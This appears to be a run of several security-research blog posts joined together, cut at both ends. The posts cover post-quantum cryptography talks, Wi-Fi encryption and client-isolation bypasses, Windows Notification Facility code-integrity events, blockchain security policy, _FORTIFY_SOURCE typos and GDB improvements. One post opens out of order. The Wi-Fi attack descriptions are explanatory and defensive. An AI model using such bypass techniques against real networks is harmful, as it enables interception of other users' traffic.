cryptography (PQC) standard candidates last year, so it did not come as a huge surprise that PQC was a big topic of discussion at RWC. In addition to the RWC conference this year, an additional Real World PQC workshop was run alongside RWC to cover additional topics. PQC is steadily advancing, with standards for the first primitives expected to emerge over the coming years. However, as the talks indicate this year, many challenges are ahead for the post-quantum world. First, implementing these schemes in real systems is challenging, with many unknown and unforeseen issues. In addition to this, more PQC primitives and protocols are needed. Designing more advanced primitives securely and effectively across many use cases will be challenging. Here are some interesting discussions of these challenges. Industry applications A talk from Google described applying PQC to their Application Layer Transport Security (ALTS) protocol. ALTS is an authentication protocol, similar to TLS, that Google uses to secure communication within its infrastructure, such as data centers. Threat modeling shows that this is where PQC is most urgently needed, so Google decided to implement NTRU-HRSS, a lattice-based post-quantum cryptosystem, for ALTS even before the NIST standardization process was complete. This talk presented some implementation issues that occurred; for instance, the public key and ciphertext for this cryptosystem were 9-10 times larger than the existing ALTS algorithms, allocating large HRSS keys on the stack resulted in stack overflows for some architectures, and performance in practice didn’t align with the expected benchmarks. However, with some adjustments, they managed to integrate NTRU-NRSS into ALTS within their requirements. Cloudflare also presented a talk describing an internal PQC project. Cloudflare supports Privacy Pass, a cryptographic protocol that allows users to prove they are humans and not bots across many websites without revealing unnecessary private information about themselves. To achieve this, Privacy Pass uses advanced cryptographic primitives known as blind signatures and anonymous credentials. Unfortunately, the NIST standardization process does not have any candidates for advanced primitives such as these, so Cloudflare designed its own post-quantum scheme that was based on Dilithium, a digital signature candidate selected by NIST. The result was surprisingly efficient: ~300ms prover time and ~20ms verifier time, with a proof size of ~100KB. It’s exciting to see post-quantum cryptography applied to more advanced cryptographic primitives and protocols such as Privacy Pass. NXP presented work that implemented the Dilithium PQC candidate on an embedded device. For embedded devices, protecting against side-channel attacks becomes vitally important. This talk identified a gap in the research around Dilithium. Compared with another candidate, Kyber, protecting against side channels in Dilithium has received little attention. NXP’s work identified some improvements to state-of-the-art mitigations. Their work also noted that much of the runtime was spent protecting the implementation by invoking the Keccak hash function, and on their embedded devices, a significant speedup could be obtained if these were replaced with calls to a True Random Number Generator (TRNG). However, using a TRNG instead of Keccak would violate the specification, which is a great example of why these standardization processes are difficult and time-consuming. Designing a system that will run securely and optimally across many different platforms and use cases is difficult. PQC in other talks While the NIST PQC standardization effort focuses on cryptographic primitives, these primitives will eventually have to be used in protocols. Updating existing protocols to include post-quantum resilient primitives is nontrivial, as explained in the context of the IETF at RWPQC (slides). Since the post-quantum candidates are relatively young by cryptographic standards, only some people trust their resistance against attacks. More than one candidate has been broken by the dreaded laptop running in a weekend. Therefore, they are preferably a hybrid approach, alongside their classical counterparts, to ensure the best of both worlds regarding security. (You would need to break both primitives to attack the protocol.) Several protocol updates were presented at RWPQC and RWC using this approach, starting with a post-quantum variant of the Noise protocol framework (video, slides) for constructing key exchange protocols. Furthermore, lightning talks at RWC and RWPQC introduced Rosenpass, a post-quantum variant of the Wireguard protocol for constructing VPNs. Cryptographic failures are often non-cryptographic Previous years of Real World Crypto featured non-cryptographic errors breaking prominent cryptographic schemes. This year was no exception: multiple talks demonstrated fatal non-cryptographic attacks on cryptographic hardware, protocols, and schemes. Cryptography is a powerful tool for solving many problems in software; many years of research and cryptanalysis have given us a powerful suite of primitives that can, for example, safely encrypt and protect our data. But software is still only as strong as its weakest link, and a secure encryption scheme is useless when an attacker can easily bypass it entirely, as we will see in some of the talks from this year: Wi-Fi Fails In strong (paper, slides, video), Mathy Vanhoef presented two new variants on a well-known class of weaknesses in the 802.11 standards, which include WPA/2 and WPA/3. The first variant completely bypasses Wi-Fi encryption by tricking an access point (AP) into insecurely “encrypting” buffered packets with an all-zero key or otherwise undefined key context. So, rather than developing some complex and novel cryptographic attack against the encryption scheme, this bug tricks an AP into using an empty encryption key. The second variant involves bypassing client isolation, a common feature of wireless networks intended for use by untrusted clients (e.g., public hotspots and global networks like eduroam). APs that offer client isolation rely on ad-hoc synchronization between two nominally decoupled layers of the 802.11 stack: the security layer, which uses 802.1X identities, and the packet routing layer, which uses IP addresses and device MACs. By observing this dependency between decoupled layers, an attacker can insert a request with a spoofed MAC and, when timed correctly, trick the AP into encrypting the incoming response with a newly generated key. The result is that the attacker cannot only spoof the victim’s MAC (ordinarily just a denial of service) but also decrypt incoming traffic intended for the victim. This attack does not rely on any sort of novel cryptographic attack. It’s easy to trick the AP into decrypting things for you instead! These two new variants are not particularly similar in procedure or scenario but are similar in origin: ambiguity within the specification with respect to extended functionality (client isolation) or optimizations (packet buffering) regularly offered by vendors. Together, these cleanly represent one of the biggest challenges to the value of formal modeling: the model under-proof must be correct and complete for actual device behavior. As we know from the world of compiler optimizations, observably equivalent behavior is not necessarily safe for all observers — the same basic truth applies to protocol design! Weak RNGs and weak testing are a toxic combination In strong (slides, video), Benadjila and Ebalard stepped through their investigation of many duplicated ECDSA keys and nonces observed while testing a large X.509 certificate corpus. When evaluating ~313,000 self-signed ECDSA certificates originating from Cisco ASA boxes, 26% (~82,000) had duplicated ECDSA nonces, and 36% (~113,000) had duplicated ECDSA keys. Additionally, of approximately 200,000 self-signed RSA certificates, 6% (~12,000) had duplicated RSA moduli. RNG failures from poor RNG selection or poor entropy sourcing have a long and storied history across hardware and software vendors, including Cisco’s ASAs (RWC 2019). The presenters immediately narrowed in on 2019’s disclosure as a likely source, indicating that the previous disclosure and fix were insufficient and potentially deployed without meaningful testing. Correct construction and use of cryptographically secure pseudo-random number generators (CSPRNGs) are subtle and difficult, with catastrophic failure modes. At the same time, CSPRNG construction and use are well-trodden problems: the sharp edges in the NIST SP-800 90A DRBGs are well understood and documented, and strong seeding has always been a requirement regardless of underlying CSPRNG construction. Much like the talk about bypassing Wi-Fi encryption, the failures here are fundamentally at the design and software development lifecycle layers rather than low-level cryptographic flaws. The takeaway is to maintain a strong test suite covering both the happy and sad code paths and incorporate the best practices regarding the software development lifecycle to prevent reintroducing old bugs or code issues. It takes a village Real World Crypto 2023 taught us that old and new cryptographic techniques and protocols benefit most when a diverse set of researchers and analyses are involved. Even after passing several rounds of scrutiny, implementations should be monitored regularly. Whether transferring data, setting up RNGs, or applying PQC, misinterpretations and errors can compromise data integrity and privacy. We are grateful to all the researchers that presented at this year’s RWC conference, who have dedicated so much effort toward securing the world we live in, and we are proud to be active members of this community. By Yarden Shafir, Senior Security Engineer WNF (Windows Notification Facility) is an undocumented notification mechanism that allows communication inside processes, between processes, or between user mode processes and kernel drivers. Similar to other notification mechanisms like ETW (Event Tracing for Windows) and ALPC (Advanced Local Procedure Call), WNF communication happens over different “channels,” each representing a unique provider or class of information. Offensive engineers already found several uses for WNF. Alex Ionescu and Gabrielle Viala reported information leaks and denial-of-service bugs that were fixed by Microsoft; @modexpblog demonstrated code injection through WNF names, which is undetected by pretty much all EDR products; and Alex Plaskett of NCC Group demonstrated how attackers could use WNF allocations to spray the kernel pool. WNF is used extensively by Windows components to send or receive information about software and hardware states. It can be used in the same way by 3rd party applications to learn about the state of the system, send messages to Windows processes or drivers or as an internal communication channel between processes or drivers (though WNF is undocumented and therefore not meant to be used by 3rd parties at all). Reading and interpreting WNF state names In the WNF world, these previously mentioned “channels” are called state names. WNF state names are 64-bit numbers that are composed of: Version Lifetime: Well-known, predefined in the system Permanent, persist in the registry across boot sessions Persistent, persist in memory, but not across boot sessions Temporary, only exist in the context of the process and is gone when the process terminates Scope: System, Session, User, Process, or Physical Machine Permanent data bit Unique sequence number These attributes are combined into the state name using this bit layout: typedef struct _WNF_STATE_NAME_INTERNAL { ULONG64 Version : 4; ULONG64 NameLifetime : 2; ULONG64 DataScope : 4; ULONG64 PermanentData : 1; ULONG64 Unique : 53;} WNF_STATE_NAME_INTERNAL, * PWNF_STATE_NAME_INTERNAL; Until recently, this mechanism was almost exclusively meant for hardware components such as the battery, microphone, camera, and Bluetooth, and held very little interest for defensive engineers. But that is beginning to change with the recent addition of several new state names used by the kernel code integrity manager, which now uses WNF to notify the system about interesting code integrity events that might be useful to security tools. While still undocumented and unrecommended for general use, it may be time for defenders to start looking further into WNF and its potential benefits. Starting from Windows 10, WNF now offers several added well-known state names that get notified by the kernel Code Integrity Manager (CI.dll). This component is responsible for all kernel hashing, signature checks, and code integrity policies, which is rich information for all security products. How do we find out about those names? Well, to dump all well-known state names on the machine, you’d have to install the Microsoft SDK, then run WnfNameDumper to retrieve all WNF names defined in perf_nt_c.dll and dump their human-friendly names, IDs, and descriptions into a file, which would look like this: {“WNF_CELL_UTK_PROACTIVE_CMD”, 0xd8a0b2ea3bcf075}, // UICC toolkit proactive command notification for all slots. SDDL comes from ID_CAP_CELL_WNF_PII // and UtkService in %SDXROOT%\src\net\Cellcore\packages\Cellcore\Cellcore.pkg.xml {“WNF_CELL_UTK_SETUP_MENU_SLOT0”, 0xd8a0b2ea3bce875}, // UICC toolkit setup menu notification for slot 0. SDDL comes from ID_CAP_CELL_WNF_PII // and UtkService in %SDXROOT%\src\net\Cellcore\packages\Cellcore\Cellcore.pkg.xml {“WNF_CELL_UTK_SETUP_MENU_SLOT1”, 0xd8a0b2ea3bdd075}, // UICC toolkit setup menu notification for slot 1. SDDL comes from ID_CAP_CELL_WNF_PII // and UtkService in %SDXROOT%\src\net\Cellcore\packages\Cellcore\Cellcore.pkg.xml etc., etc., etc… In Windows version 22H2, the Windows SDK contains just over 1,400 well-known state names. Many of those names can be revealing, but for now, we’ll focus on the WNF_CI (code integrity) names: {“WNF_CI_APPLOCKERFLTR_START_REQUESTED”, 0x41c6072ea3bc2875}, // This event signals that AppLockerFltr service should start. {“WNF_CI_BLOCKED_DRIVER”, 0x41c6072ea3bc1875}, // This event signals that an image has been blocked from loading by PNP {“WNF_CI_CODEINTEGRITY_MODE_CHANGE”, 0x41c6072ea3bc2075}, // This event signals that change of CodeIntegrity enforcement mode has occurred. {“WNF_CI_HVCI_IMAGE_INCOMPATIBLE”, 0x41c6072ea3bc1075}, // This event signals that an image has been blocked from loading as it is incompatible with HVCI. {“WNF_CI_SMODE_CHANGE”, 0x41c6072ea3bc0875}, // This event signals that change of S mode has occurred. In this version we can see five state names with the prefix WNF_CI, all generated by the Code Integrity manager, and each one has a helpful description telling us what it’s used for. And unlike most other WNF names, here we see a few events that could be helpful to defensive engineers: WNF_CI_APPLOCKERFLTR_START_REQUESTED – Signals that AppLockerFltr service should start WNF_CI_BLOCKED_DRIVER – Signals that a driver has been blocked from loading by HVCI (Hypervisor-protected Code Integrity) because it was found in the block list WNF_CI_CODEINTEGRITY_MODE_CHANGE – Signals that a change of CodeIntegrity enforcement mode has occurred WNF_CI_HVCI_IMAGE_INCOMPATIBLE – Signals that an image has been blocked from loading as it is incompatible with HVCI, most likely because it has regions that are both writable and executable or allocates memory from the executable non-paged pool WNF_CI_SMODE_CHANGE – Signals that a change of S mode has occurred Usually, the buffers passed into WNF state names are a mystery, and their contents must be reverse-engineered. But in this case, Microsoft exposes the data passed into one of the state names in the public Microsoft Symbol Server, accessed through symchk.exe and symsrv.dll: typedef struct _WNF_CI_BLOCKED_DRIVER_CONTEXT{ /* 0x0000 */ struct _GUID Guid; /* 0x0010 */ unsigned long Policy; /* 0x0014 */ unsigned short ImagePathLength; /* 0x0016 */ wchar_t ImagePath[1];} WNF_CI_BLOCKED_DRIVER_CONTEXT, *PWNF_CI_BLOCKED_DRIVER_CONTEXT; We can get some information from the Code Integrity manager, which could be useful for EDR products. Some of this can also be found in the Microsoft-Windows-CodeIntegrity ETW (Event Tracing for Windows) channel, as well as other interesting events (which deserve a post of their own). Still, some of the data in these WNF names can’t be found in any other data source. Now if we update our SDK version to the preview build (25336 during the writing of this post), we can see a few other WNF state names that haven’t been released to the regular builds yet: {“WNF_CI_APPLOCKERFLTR_START_REQUESTED”, 0x41c6072ea3bc2875}, // This event signals that AppLockerFltr service should start. {“WNF_CI_BLOCKED_DRIVER”, 0x41c6072ea3bc1875}, // This event signals that an image has been blocked from loading by PNP {“WNF_CI_CODEINTEGRITY_MODE_CHANGE”, 0x41c6072ea3bc2075}, // This event signals that change of CodeIntegrity enforcement mode has occurred. {“WNF_CI_HVCI_IMAGE_INCOMPATIBLE”, 0x41c6072ea3bc1075}, // This event signals that an image has been blocked from loading as it is incompatible with HVCI. {“WNF_CI_LSAPPL_DLL_LOAD_FAILURE”, 0x41c6072ea3bc3075}, // This event signals that a dll has been blocked from loading as it is incompatible with LSA running // as a protected process. {“WNF_CI_LSAPPL_DLL_LOAD_FAILURE_AUDIT_MODE”, 0x41c6072ea3bc3875}, // This event signals that an unsigned dll load was noticed during LSA PPL audit mode. {“WNF_CI_SMODE_CHANGE”, 0x41c6072ea3bc0875}, // This event signals that change of S mode has occurred. Here, we see two new state names that add information about PPL-incompatible DLLs being loaded into the Local Security Authority Subsystem Service (LSASS). LSASS, the OS authentication manager, runs as a PPL (Protected Process Light). This ensures that the process isn’t tampered with and is only running code signed with the correct signature level. Investigating LSASS protections with WNF Microsoft has been trying to make LSASS run as a PPL for a while now. Still, it couldn’t fully enable it because of compatibility issues with products that require full access to LSASS, including the injection of different plugins. However, they’re attempting to still protect LSASS as much as possible from credential stealers like Mimikatz, while still allowing users the option to turn LSASS back to a regular process. Since Windows 8.1, there is an option to run LSASS as a PPL in audit mode. This means the system still treats it as a normal process but logs any operation that would have been blocked if it ran as a PPL. In Windows 11 it runs as a regular PPL by default, with an option to run it in audit mode exposed through the registry and the security center (in Preview builds) So this is where our two new state names come in: WNF_CI_LSAPPL_DLL_LOAD_FAILURE gets notified when LSASS is running as a regular PPL, and a DLL isn’t signed according to the PPL requirements is blocked from loading into the process. And WNF_CI_LSAPPL_DLL_LOAD_FAILURE_AUDIT_MODE gets notified when LSASS is running as a PPL in audit mode and loads a DLL that would have been blocked if it was running as a normal PPL. Endpoint Detection & Response (EDR) tools can be alerted about all DLL loads through a documented kernel callback. The image load notify routine does include cached signing information inside IMAGE_INFO in the fields ImageSignatureLevel and ImageSignatureType, however this information may not always be available, and the callback isn’t notified about blocked DLL loads. Blocked DLL loads are interesting as they indicate what could be an exploitation attempt (or an organization trying to load their plugin written in 2003 into LSASS). So, while none of these new state names contain any information that is exceptionally interesting to EDRs, they do have some interesting data that security products could find useful and, at a minimum, add some visibility or save the EDR some work. And, of course, there is already one user for some of these WNF_CI state names: The Windows Defender command-line tool MpCmdRun.exe. MpSvc.dll, one of the DLLs loaded into MpCmdRun.exe, subscribes to two WNF state names: WNF_CI_CODEINTEGRITY_MODE_CHANGE and WNF_CI_SMODE_CHANGE. Whenever they are notified, the DLL queries them to get the new values and updates its internal configuration accordingly. Other pieces of the system subscribe to these state names too. I used WinDbg commands to extract this list from my own system: The DcomLaunch service registers to WNF_CI_SMODE_CHANGE, WNF_CI_BLOCKED_DRIVER and WNF_CI_APPLOCKERFLTR_START_REQUESTED Utcsvc service (through utcsvc.dll) registers to WNF_CI_SMODE_CHANGE SecurityHealthService.exe registers to WNF_CI_SMODE_CHANGE Msteams.exe registers to WNF_CI_SMODE_CHANGE PcaSvc service (through PcaSvc.dll) registers to WNF_CI_HVCI_IMAGE_INCOMPATIBLE and WNF_CI_BLOCKED_DRIVER – this is the service responsible for displaying the pop-up message when your favorite vulnerable driver won’t load on your HVCI-enabled system. Currently, no process subscribes to the new LSA (Local Security Authority) state names (WNF_CI_LSAPPL_DLL_LOAD_FAILURE and WNF_CI_LSAPPL_DLL_LOAD_FAILURE_AUDIT_MODE), but since those are still in the preview stage that isn’t very surprising and I’m sure we’ll be seeing some subscriptions to it in the future. Explore the possibilities with new WNF info Windows has empowered security enthusiasts on both the offensive and defensive sides with newly attainable information in WNF. By expanding beyond the historical scope and adding state names to WNF, researchers have a more transparent view of how things operate. Over time, it’s likely you’ll see security researchers correlate this information with other events and processes to showcase novel security research! Here, we’ve provided a quick introduction to WNF and its new features along with a simple example of how it can be used to investigate LSASS. If you’re interested in more details on WNF internals and its offensive capabilities, Alex Ionescu and Gabrielle Viala presented it in detail in a BlackHat 2018 talk. They later published a blog post and a collection of useful scripts. Last September, Principal Security Engineer Dr. Evan Sultanik was on a panel hosted by the Naval Postgraduate School’s Distributed Consensus: Blockchain & Beyond (DC:BB) movement, where faculty and students there are seeking opportunities to learn and share knowledge, research, funding, and events focused on distributed consensus technologies. The panel of nine government, academia, and industry experts discussed how blockchains, digital assets, and other Web3 technologies intersect with national security challenges. Dr. Sultanik discussed how the U.S. could help push global adoption and take a broader strategic outlook toward blockchain and Web3 technologies. He talked about the inherent limitations of blockchain technologies and the Web3 movement and also offered suggestions from a training perspective that could lead to a more robust ecosystem. We’ve summarized the most important parts of that discussion here. What are the some important things to consider when using blockchain technologies for a project? It’s fundamental to better understand the tradeoffs one must make when using a blockchain and its security implications. Everyone at this point is aware that using a blockchain has significant additional overhead in terms of deployment and the cost of interacting with smart contracts. The cost gradually decreases with the transitions to the new forms of consensus and higher-level protocols, but there’s still a significant difference. You have to realize that all data stored on a public blockchain is publicly available. Anyone can look through the entire history of each account or contract and understand the implications of those actions. You need to do something additional to ensure its privacy if that’s a requirement of your system. The majority of participants in a public blockchain are untrusted. You are shifting trust from what would otherwise be a central authority to other entities that you may or may not have control over. You’re not only trusting the developers of the smart contracts that your system is interacting with, but you’re also inherently trusting the developers of the technology stack running that particular blockchain. You’re trusting the node software, the mining hardware, the mining software, the mining pool protocol, and everything else down the line. A bug in any one piece of that stack can cause the whole thing to collapse. Blockchains allow developers to prototype new ideas quickly. You don’t have to worry about things like setting up infrastructure, and you don’t have to worry much about DevOps because that’s all handled by the blockchain itself. That allows you to significantly reduce the time between when an idea is created and when it is in the users’ hands. But that cycle also comes with risk because a tight development cycle can lead to poorly tested or designed protocols or sloppy development, leading to bugs with significant consequences, like being a big target for attackers. Another thing that makes DeFi, blockchain, and Web3 so appealing is that you can prototype quickly and instantly connect your application to the whole ecosystem. Since the blockchain acts as a huge shared database, contracts and assets created by competitors can be made to interact with each other in ways that would be disincentivized if implemented on a traditional centralized platform. This composition does come at a price. It’s difficult to reason about the system because you suddenly must understand all the different contracts that created these tokens. It’s different code in each case. And your code suddenly interacts with the whole universe of code on the blockchain. So, you must be mindful of all these other externalities and third-party components your app might interact with. We’ve seen this complexity play out recently with new types of financial instruments and technology that have become available, particularly on Ethereum, such as flash loans or maximum extractable value, which are really deep technical concepts. Still, millions of dollars have been lost because a bunch of different DeFi apps are composed in a single transaction in a way that none intended to be composed. Computer scientist Leslie Lamport wrote in 1987, “A distributed system is one in which the failure of a computer you didn’t even know existed can render your computer unusable.” This is still true today and will always be true in blockchains. Should the U.S. care about blockchain technologies, and if so, what’s the best application for the government? It’s a matter of national security that the U.S. government gets involved with blockchains: Other than perhaps lost tax revenue, Uncle Sam doesn’t really care if you lose your Bitcoin. But Uncle Sam should care if North Korea steals it. U.S. adversaries are already exploiting these technologies to circumvent sanctions and undermine our markets. It’s more productive to ask, “Can blockchain and Web3 technologies ever be made secure? If so, how?” The U.S. government needs to foster research and innovation to answer this question to stay relevant and remain a world leader in distributed ledger technology. How should the U.S. handle the training regimen needed in the Web3 space? There is a large need to change how we educate the incoming workforce because traditional software development expertise does not directly translate into Web3. I have friends who don’t have a background in computer science, yet they learned one programming language, wrote a mobile app, and are now millionaires. They don’t have any technical knowledge of what a phone is doing, how iOS or Android is running, or how the hardware works. They just needed to know that one programming language, and that was sufficient for them to build something very popular and effective. That isn’t true for Web3. Knowing the entire stack is helpful when creating smart contracts, because you need to understand the compiler that you’re using. You need to understand the virtual machine that’s running. You need to understand byzantine, fault-tolerant, and consensus protocols. You should understand zero-knowledge proofs or zk-SNARKs. You should understand all of these esoteric technologies, and very few experts know any of them, let alone all of them. You need to be an expert in them to avoid all the pitfalls and footguns. We need policies incentivizing people to enter the workforce with these necessary skills. At Trail of Bits, we’ve developed a blockchain security apprenticeship because finding people with all the necessary skills is difficult in this competitive market. Some security people know how to analyze a C++ program or a mobile app, but they have no idea about blockchain. And then you have blockchain people who have no background in security. So we developed this in-house program. For mobile app stores, there has always been a low barrier to entry for people looking to get involved in the app economy. With Web3, that doesn’t seem to be the case, yet there is a lot of activity in this space. What more needs to be done to bring developers to a level where blockchain is mature from a security perspective, and what entities or organizations should lead that effort? The barrier to entry is surprisingly low for Web3, too, which is part of the problem: Web3 development toolchains have been modeled after familiar toolchains from traditional app development. Developer friendliness has been prioritized at the expense of security. We need to modernize and improve the tooling to flip the balance of that prioritization. Conclusion It’s not enough for governments to only express interest in securing blockchain technologies. Real, purposeful investments need to be made. Beyond the design of secure architectures, languages, compilers, and protocols, these investments should also include educating a robust workforce to meet tomorrow’s Web3 demands. If you’re considering whether a blockchain might be the solution to a problem you’re trying to solve, we recommend our operational risk assessment titled, “Do You Really Need a Blockchain?” This will give you a thorough look into the advantages and risks you may be taking. Finally, if you would like to hear more from the other experts on the panel about blockchain technologies and national security, you can view the discussion in its entirety at: https://nps.edu/web/nps-video-portal/-/blockchain-research-opportunities-for-nps-students-and-faculty. p p microsoft/binskim#777 PowerShell/PowerShell-Native#88 apple-open-source/macos#3: Though this is an unofficial fork, so I reported this further in Apple’s Feedback Assistant trailofbits/cb-multios#96 (Yeah, we also had this issue!) lavabit/libdime#49 lavabit/magma#155 Jackysi/advancedtomato#454 adaptivecomputing/torque#474 gstrauss/mcdb#14 Homegear/Homegear#364 sergey-dryabzhinsky/dedupsqlfs#235 randlabs/algorand-windows-node#5 rpodgorny/unionfs-fuse#131 cgaebel/pipe#15 jkrh/kvms#48 angaza/nexus-embedded#8 hashbang/book#24 We’ll show you how to test your code to avoid this issue that could make it easier to exploit bugs. How source fortification works The source fortification is a security mitigation that replaces certain function calls with more secure wrappers that perform additional runtime or compile-time checks. Source fortification is enabled by defining a special macro, “_FORTIFY_SOURCE=”, with a value of 1, 2, or 3 and compiling a program with optimizations. The higher the value, the more functions fortified or checks performed. Also, the libc library and compiler must support the source fortification option, which is the case for glibc, Apple Libc, gcc, and LLVM/Clang, but not musl libc and uClibc-ng. The implementation specifics may also vary. For example, level value 3 was only recently added in glibc 2.34, but it does not seem to be available in Apple Libc. The following example shows source fortification in action. Whether or not we enable the mitigation, the resulting binary will call either the strcpy function or its __strcpy_chk wrapper: Figure 1: Compiler Explorer comparison of the assembly generated by the compiler. In this case, the __strcpy_chk wrapper function is implemented by glibc (source): /* Copy SRC to DEST and check DEST buffer overflow*/char * __strcpy_chk (char *dest, const char *src, size_t destlen) { size_t len = strlen (src); if (len >= destlen) __chk_fail (); return memcpy (dest, src, len + 1);} Figure 2: The __strcpy_chk function from glibc As we can see, the wrapper takes one more argument—the destination buffer size—and then checks if the length of the source is bigger than the destination. If it is, the wrapper calls the __chk_fail function, which aborts the process. Figure 1 shows that the compiled code passes the correct length of the dest destination buffer in the mov edx, 10 instruction. Tpying is hard Since a preprocessor macro determines source fortification, a typo in the macro spelling effectively disables it, and neither the libc nor the compiler catches this issue, unlike typos made in other security hardening options enabled with compiler flags instead of macros. Effectively, if you pass in “-DFORTIFY_SOURCE=2 -O2” instead of “-D_FORTIFY_SOURCE=2 -O2” to the compiler, the source fortification won’t be enabled, and the wrapper functions will not be used: Figure 3: Assembly when making a typo in the _FORTIFY_SOURCE macro (created with Compiler Explorer) I searched for this and similar bug patterns using grep.app, sourcegraph.com, and cs.github.com tools, and I sent 20 pull requests. Three of my pull requests were slightly different outside of the list at the beginning of this post. kometchtech/docker-build#50 used “-FORTIFY_SOURCE=2 -O2”. This is not detected as a compiler error because it is a “-F<dir>” flag, which sets “search path for framework include files.” ned14/quickcpplib#37 had a typo in the “-fsanitize=safe-stack” compiler flag. Although compilers detect such a typo, the flag was used in a CMake script to determine if the compiler supports the safe stack mitigation. The CMake script never enabled this mitigation because of this typo. I found this case thanks to my colleague, Paweł Płatek, who suggested checking whether compilers detect typos in security-related flags. Although they do, flag typos may still cause issues during compiler feature detection. OpenImageIO/oiio#3729 was an invalid report/PR since the “-DFORTIFY_SOURCE=2” option provided a value for a CMake variable that eventually led to setting the proper _FORTIFY_SOURCE macro. (However, that is still an unfortunate CMake variable name.) The three code search tools I used can find more cases like this, but I didn’t send PRs to all of them, like when a project seemed abandoned. Testing _FORTIFY_SOURCE mitigation In addition to testing code during continuous integration, developers should also test the results of build systems and the options they have chosen to enable. Apart from helping to detect regressions, this can also help understand what the options really do, like when source fortification is disabled when optimizations are disabled. So, how do you see if you enabled source fortification correctly? You can scan the symbols used by your binary and ensure that the fortified source functions you expect to be used are really used. A simple Bash script like the one shown below can achieve this: if readelf --symbols /bin/ls | grep -q ' __snprintf_chk@'; then echo "snprintf is fortified";else echo "snprintf is not fortified";fi Figure 3: Simple Bash script to check for a fortified symbol However, in practice, you should just scan your binary for security mitigations with a binary analysis tool such as checksec.rs, BinSkim Binary Analyzer, Pwntools’ checksec, checksec.sh or winchecksec (a tool Trail of Bits created for checksec on Windows). Before using a tool, it’s a good idea to double-check if it works properly. As referenced in the above list of bugs, BinSkim had a typo in its recommendations text. Another bug, this time in checksec.sh, resulted in incorrect results in “Home Router Security Report 2020.” What was the reason for the bug in checksec.sh? If a scanned binary used stack canaries, the “__stack_chk_fail” symbol (used to abort the program if the canary was corrupted) incorrectly accounted for source fortification. This is because checksec.sh looked for a “_chk” string in the output of the readelf –symbols command, instead of expecting that the symbol name suffix matches the “_chk” string. This bug appears to be fixed after the issues reported in slimm609/checksec.sh#103 and slimm609/checksec.sh#130 were resolved. It is also worth noting that both BinSkim and checksec.sh can tell you how many fortifiable functions there are vs. how many are fortified in your binary. How do they do that? BinSkim keeps a hard-coded list of fortifiable function names deduced from glibc, and checksec.sh scans your own glibc to determine those names. Although this can prevent some false positives, those solutions are still imperfect. What if your binary is linked against a different libc or, in the case of BinSkim, what if glibc added new fortifiable functions? Last but not least, none of the tools detect the actual fortification level used, but perhaps that only impacts the number of fortifiable functions. I am not sure. Fun fact: Typo in Nginx During this research, I also found out that the Nginx package from Debian had this kind of typo bug in the past. Currently, the Nginx package uses a dpkg-buildflags tool that provides the proper macro flag: $ dpkg-buildflags --get CPPFLAGS-Wdate-time -D_FORTIFY_SOURCE=2$ dpkg-buildflags --get CFLAGS-g -O2 -fdebug-prefix-map=/tmp/nginx-1.18.0=. -fstack-protector-strong -Wformat -Werror=format-security It is weird that the source fortification and optimization flags are separated into CFLAGS and CPPFLAGS. Wouldn’t some projects use one but not the other and miss some of the options? I haven’t checked that. Some wishful thinking In an ideal world, a compiler would automatically include information about all necessary security mitigations and hardening options in the generated binary. However, we are limited by the incomplete information we must work with. When testing your build system, there doesn’t seem to be a silver bullet, especially since not all security mitigations are straightforward to check, and some may require analyzing the resulting assembly. We haven’t analyzed the tools exhaustively, but we would probably recommend using checksec.rs or BinSkim for Linux and winchecksec for Windows. We also plan to extend Blight, our build instrumentation tool, to find the mistakes described in this blog post during build time. Even so, it probably still makes sense to scan the resulting binary to confirm what the compiler and linker are doing. Finally, contact us if you find this research interesting and you want to secure your software further, as we love to work on hard security problems. By Matheus Branco Borella, University of São Paulo As a winter associate at Trail of Bits, my goal was to make two improvements to the GNU Project Debugger (GDB): make it run faster and improve its Python API to support and improve tools that rely on it, like Pwndbg. The main goal was to run symbol parsing in parallel and better use all available CPU cores. I ultimately implemented three changes that enhanced GDB’s Python API. Beyond the actual code, I also learned about upstreaming patches in GDB. This process can take a while, has a bit of a learning curve, and involves a lot of back and forth with the project’s maintainers. I’ll discuss this in the post, and you can also follow along as my work is still being debated in the GDB patches mailing list. Why make GDB faster? GDB has three ways to load DWARF symbols from a program: Partial symbol table loader: The index loader is responsible for loading in symbol names and connecting them to their respective compilation units (CUs), leaving the parsing and building of their symbol tables to the full loader. Parsing will be done later only when full information about the symbol is required. Full symbol table loader: Finishes the work the index loader has left for later by parsing the CUs and building their symbol tables as needed. This loader fully parses the DWARF information in the file and stores it in memory. Index parser: ELFs can have a special .gdb_index section, added either with the –gdb-index linker flag or with the gdb-add-index tool provided by GDB. The tool stores an index for the internal symbol table that allows GDB to skip the index construction pass, significantly reducing the time required to load the binary in GDB. The original idea was to port the parallel parsing approach in drgn, Meta’s open-source debugger, to GDB. Parallel parsing had already been implemented for the index loader, leaving only the full loader and the index parser as potential next candidates in line for parallelization. You can think of GDB’s parsing routines as split into concurrent tasks on a per-CU basis since they’re already invoked sequentially once per CU. However, this understanding has a major issue: despite the ostensive separation of the data, it is not separated into data that is fully read-write, partially read-write with implicit synchronization, and read-only. The parsing subroutines fully expect all of these data structures to be read-write, at least to a degree. While solving most of these is a simple case of splitting the values into separate read-write copies (one owned by each thread), things like the registries, the caches, and particularly the obstacks are much harder to move to a concurrent model. What’s an obstack? General purpose allocations, like malloc(), are time-consuming. They may not be efficient when users need to allocate many small objects as quickly as possible since they store metadata within each allocation. Enter allocation stacks. Each new object is allocated on the top and freed from the top in order. The GNU Obstack, an implementation of such an allocator, is used heavily in GDB. Each reasonably long-lived container object, including objfile and gdbarch, has its instance of an obstack and is used to hold the objects it references and frees them all at once, together with the object itself. If you’re knowledgeable on object lifetime tracking—be it dynamic, like you’d get with std::shared_ptr, or static, like with references in Rust—the last paragraph will have sounded familiar. Judging by how obstack allocations are used in GDB, someone might assume there is a way to guarantee that objects will live as long as the container that owns them. After discussing this with others in the IRC and mailing list, I reached two conclusions: it would take a considerable amount of time to investigate it, and I was better off prioritizing the Python API so that I could have a chance at completing the improvements on time. Ultimately, I spent most of my time on those attainable goals. GDB objects __repr__ methods The first change is fairly simple. It adds __repr__() implementations to a handful of types in the GDB Python API. This change makes the messages we get from inspecting types in the Python REPL more informative about what those types represent. Previously, we would get something like this, which is hardly helpful (note: pi is the GDB command to run the Python REPL): (gdb) pi>>> gdb.lookup_type("char") Now, we can get the following, which tells us what kind of type this is, as well as its name, rather than where the object is located in memory: (gdb) pi>>> gdb.lookup_type("char") This also applies to gdb.Architecture, gdb.Block, gdb.Breakpoint, gdb.BreakpointLocation, and gdb.Symbol. This helped me 